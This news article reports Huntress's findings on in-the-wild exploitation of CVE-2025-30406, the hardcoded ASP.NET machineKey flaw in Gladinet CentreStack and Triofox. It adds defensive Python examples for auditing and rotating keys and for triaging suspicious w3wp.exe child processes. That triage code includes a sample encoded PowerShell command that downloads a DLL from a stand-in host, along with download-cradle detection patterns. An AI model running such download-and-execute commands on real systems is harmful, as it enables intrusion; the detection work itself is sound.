Huntress Documents In-The-Wild Exploitation of Critical Gladinet Vulnerabilities

The flaw, tagged as CVE-2025-30406, was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog in early April.

Security researchers at Huntress are documenting active exploitation of a critical vulnerability in Gladinet's CentreStack and Triofox software, where the products' default cryptographic configuration has enabled attacks against seven organizations and triggered anomalous activity on roughly 120 endpoints.

The flaw, tagged as CVE-2025-30406, was added to CISA's Known Exploited Vulnerabilities (KEV) catalog in early April and carries a CVSS score of 9.0 out of 10.

The vulnerability stems from hardcoded cryptographic keys that both CentreStack and Triofox ship by default in their configuration files. In ASP.NET these keys (the machineKey) are what sign and encrypt the ViewState that web forms round-trip through the client, so a value that is identical on every installation is a secret that is no secret at all, and it left servers exposed to remote code execution.

In this case, knowing the default keys lets an attacker forge a ViewState payload that passes the server's integrity check; ASP.NET then deserializes the attacker's object graph and executes code as the IIS application pool identity, with potential escalation to full system control.
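To make the mechanism concrete, here is an added example (not Gladinet's or Huntress's code) that audits the ASP.NET machineKey in a web.config, fingerprints it so that identical keys can be spotted across servers, and generates a fresh per-server replacement. The configuration text and the key values in it are constructed placeholders, not the vendor's actual defaults.

```python
import hashlib
import secrets
import xml.etree.ElementTree as ET

# Constructed web.config fragment with a fixed, vendor-style key. The hex values are
# placeholders for illustration only; they are NOT Gladinet's real default keys.
SHARED_DEFAULT_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

WEAK_ALGORITHMS = {"SHA1", "MD5", "3DES", "DES"}
HEX = set("0123456789abcdefABCDEF")


def read_machine_key(web_config_xml):
    """Return the <machineKey> attributes from a web.config string, or None if absent."""
    root = ET.fromstring(web_config_xml)
    el = next(root.iter("machineKey"), None)
    return dict(el.attrib) if el is not None else None


def audit_machine_key(mk):
    """List properties of a <machineKey> that make forged ViewState easier."""
    findings = []
    if mk is None:
        # No element: ASP.NET auto-generates per-machine keys, the safe default for one server.
        return findings
    for attr, min_hex, why in (("validationKey", 128, "64 bytes recommended for HMACSHA256"),
                               ("decryptionKey", 64, "32 bytes needed for AES-256")):
        value = mk.get(attr, "")
        if value.startswith("AutoGenerate"):
            continue
        if len(value) < min_hex or any(c not in HEX for c in value):
            findings.append(f"{attr} is {len(value)} hex chars or not hex; {why}")
    if mk.get("validation", "").upper() in WEAK_ALGORITHMS:
        findings.append(f"validation={mk['validation']} is weak; use HMACSHA256")
    if mk.get("decryption", "").upper() in WEAK_ALGORITHMS:
        findings.append(f"decryption={mk['decryption']} is weak; use AES")
    return findings


def key_fingerprint(mk):
    """Short SHA-256 of the validationKey so keys can be compared across hosts without copying them."""
    return hashlib.sha256(mk["validationKey"].encode()).hexdigest()[:16]


def shared_keys(configs_by_host):
    """Group hosts whose web.config carries the same validationKey: {fingerprint: [host, ...]}.
    The same key on unrelated installations is the signature of a vendor-shipped default."""
    groups = {}
    for host, xml_text in configs_by_host.items():
        mk = read_machine_key(xml_text)
        if mk and "validationKey" in mk and not mk["validationKey"].startswith("AutoGenerate"):
            groups.setdefault(key_fingerprint(mk), []).append(host)
    return {fp: hosts for fp, hosts in groups.items() if len(hosts) > 1}


def generate_machine_key():
    """Fresh <machineKey>: 64-byte key for HMACSHA256 validation, 32-byte key for AES decryption."""
    return (f'<machineKey validationKey="{secrets.token_hex(64).upper()}" '
            f'decryptionKey="{secrets.token_hex(32).upper()}" '
            'validation="HMACSHA256" decryption="AES" />')


def rotated_config(web_config_xml):
    """Return web_config_xml with every <machineKey> replaced by a newly generated one."""
    root = ET.fromstring(web_config_xml)
    parents = [p for p in root.iter() if any(c.tag == "machineKey" for c in p)]
    for parent in parents:
        for child in [c for c in parent if c.tag == "machineKey"]:
            parent.remove(child)
            parent.append(ET.fromstring(generate_machine_key()))
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    fleet = {"srv-a": SHARED_DEFAULT_CONFIG, "srv-b": SHARED_DEFAULT_CONFIG,
             "srv-c": rotated_config(SHARED_DEFAULT_CONFIG)}
    print("findings on shared default:", audit_machine_key(read_machine_key(SHARED_DEFAULT_CONFIG)))
    print("hosts sharing a key:", shared_keys(fleet))
```

Rotating the key invalidates outstanding ViewState and forms-authentication tickets on that server, so do it in a maintenance window; nodes of one web farm must share the new key, but it should be one you generated, never one the installer shipped.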

Huntress said its security operations center caught the activity on April 11, when an internal detector built to surface zero-day exploitation fired on abnormal outbound connections from an unexpected child process of the IIS worker process (w3wp.exe).

The company said this initial detection, highlighted by a suspicious process tree rooted in PowerShell, set off a cascade of alerts as its analysts pieced together evidence from failed ViewState verifications and other indicators visible in the Windows event logs.

The company said the exploits followed a well-known playbook. Once a vulnerable server is identified, threat actors issue carefully crafted PowerShell commands to trigger the vulnerability, ultimately leading to remote code execution. 

In one instance, Huntress researchers say they traced a command sequence involving an encoded PowerShell directive intended to download and execute a DLL, an approach seen in recent attacks on CrushFTP software vulnerabilities.
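The detection chain described above (an unexpected child of w3wp.exe, an encoded PowerShell command carrying a download cradle, and ViewState verification failures in the Application log) can be reproduced over process-creation and event-log records. The following is an added example, not Huntress's detector: the records are constructed for illustration, the suspicious-child and download-cradle lists are starting points to tune, and the assumption is that the "failed ViewState verifications" on the page are the Event ID 1316 records ASP.NET 4.x writes with the message "Viewstate verification failed".

```python
import base64
import re
from dataclasses import dataclass

# Children an IIS worker process (w3wp.exe) should not normally spawn on an app server.
# csc.exe and similar compiler helpers are deliberately absent: ASP.NET spawns those legitimately.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
    "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe",
}
# Common PowerShell download-and-run primitives; extend for your environment.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Start-BitsTransfer|Invoke-Expression|\biex\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcessEvent:          # Sysmon event 1 / Security 4688 style record
    parent_image: str
    image: str
    command_line: str


@dataclass
class AppEvent:              # Windows Application log record
    source: str
    event_id: int
    message: str


def decode_encoded_command(command_line):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); None if absent or malformed."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process(ev):
    """Findings for one process-creation record."""
    findings = []
    if _basename(ev.parent_image) == "w3wp.exe" and _basename(ev.image) in SUSPICIOUS_CHILDREN:
        findings.append(f"w3wp.exe spawned {_basename(ev.image)}")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    if DOWNLOAD_CRADLE.search(decoded or ev.command_line):
        findings.append("download cradle in command line")
    return findings


def viewstate_mac_failures(events):
    """Count ASP.NET 4.x 'Viewstate verification failed' records (Application log, Event ID 1316)."""
    return sum(1 for e in events
               if e.event_id == 1316 and "viewstate verification failed" in e.message.lower())


def triage(processes, app_events):
    """Correlate both signals: a suspicious w3wp.exe child plus failed ViewState MACs."""
    per_process = {i: f for i, f in ((i, score_process(p)) for i, p in enumerate(processes)) if f}
    mac_failures = viewstate_mac_failures(app_events)
    spawned = any(f.startswith("w3wp.exe spawned") for fs in per_process.values() for f in fs)
    return {"process_findings": per_process,
            "viewstate_mac_failures": mac_failures,
            "escalate": spawned and mac_failures > 0}


# Constructed sample telemetry (not records from the incident); 203.0.113.10 is a documentation address.
_PAYLOAD = "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/x.dll','C:\\Windows\\Temp\\x.dll')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_PROCESSES = [
    ProcessEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {_ENCODED}"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\inetsrv\w3wp.exe",
                 'w3wp.exe -ap "DefaultAppPool"'),
    ProcessEvent(r"C:\Windows\System32\inetsrv\w3wp.exe",
                 r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                 "csc.exe /noconfig /fullpaths @app.cmdline"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]
SAMPLE_APP_EVENTS = [
    AppEvent("ASP.NET 4.0.30319.0", 1316, "Event code: 4009 Event message: Viewstate verification failed. "
                                          "Reason: The viewstate supplied failed integrity check."),
    AppEvent("ASP.NET 4.0.30319.0", 1316, "Event code: 4009 Event message: Viewstate verification failed. "
                                          "Reason: Viewstate was invalid."),
    AppEvent("ASP.NET 4.0.30319.0", 1309, "Event code: 3005 Event message: An unhandled exception has occurred."),
]

if __name__ == "__main__":
    print(triage(SAMPLE_PROCESSES, SAMPLE_APP_EVENTS))
```

A burst of 1316 events on its own is often an attacker guessing at keys or a misconfigured web farm; it is the pairing with a w3wp.exe child that does not belong that turns the signal into an escalation.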


“There are a few hundred vulnerable servers exposed to the public Internet according to Shodan. While this may be a relatively small number, the risk of immediate compromise is still severe,” Huntress warned.

Huntress said it observed the threat actors moving laterally within networks, leveraging tools such as MeshCentral to maintain remote access. The company said the hackers also attempted to add new user accounts, execute standard enumeration commands, and employ default Impacket scripts.

Gladinet has shipped patches and acknowledged the remote code execution risk.

“We can confirm the Gladinet CentreStack and Triofox patches are effective in stopping exploitation from our tested proof-of-concept,” Huntress said.


Written By

Ryan Naraine is Editor-at-Large at SecurityWeek and host of the popular Security Conversations podcast series. He is a security community engagement expert who has built programs at major global brands, including Intel Corp., Bishop Fox and GReAT. Ryan is a founding-director of the Security Tinkerers non-profit, an advisor to early-stage entrepreneurs, and a regular speaker at security conferences around the world.
